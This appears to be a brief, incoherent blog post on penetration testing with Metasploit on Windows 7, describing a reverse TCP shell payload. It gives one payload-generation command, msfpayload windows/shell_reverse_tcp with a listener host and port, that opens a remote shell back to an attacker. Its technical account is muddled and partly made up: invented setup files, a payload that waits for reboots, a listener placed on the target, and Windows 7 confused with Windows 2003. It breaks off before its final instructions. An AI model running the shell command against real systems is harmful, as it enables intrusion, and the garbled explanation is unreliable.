.jpg)
.jpg)
Learn Penetration Testing with Metasploit on Windows 7 32-bit
The payload in this exploit is a reverse TCP shell for Windows. In our case, the shell runs Windows PowerShell inside an interactive shell. This means that a hacker can gain full access to an affected computer with no further interaction on their part. This exploit is quite capable, and can be used to compromise remote systems via RDP, which would be one of the most common entry points for an attacker. The exploits main purpose is to allow a hacker to run commands on the affected computer, such as system-level configuration changes and access to data, based on their own input. After all of that, the exploit waits for the infected target to reboot its system, then it goes silent forever until it receives a new command.
metasploit for windows 7 32-bit download
The download portion of the exploit consists of two files: a metasploit.rb exploit and a setup.rb configuration file. The setup.rb file is a Ruby script that lets the exploit know which of Metasploits pre-written exploits to use to compromise the target. Once setup.rb has been run, the metasploit.rb file is run with just one line of input to its console.
To make a long story short, I simply used the metasploit exploit after downloading it, by running the command msfpayload windows/shell_reverse_tcp lhost=192.168.137.13 lport=4444. If you have any questions about the technique, feel free to ask in the comments section below.
For the next steps, we'll need to first establish a listener on the target Windows 2003 server. You can do this by using msfconsole on the target server and typing the following (default is to use the standard Administrator account):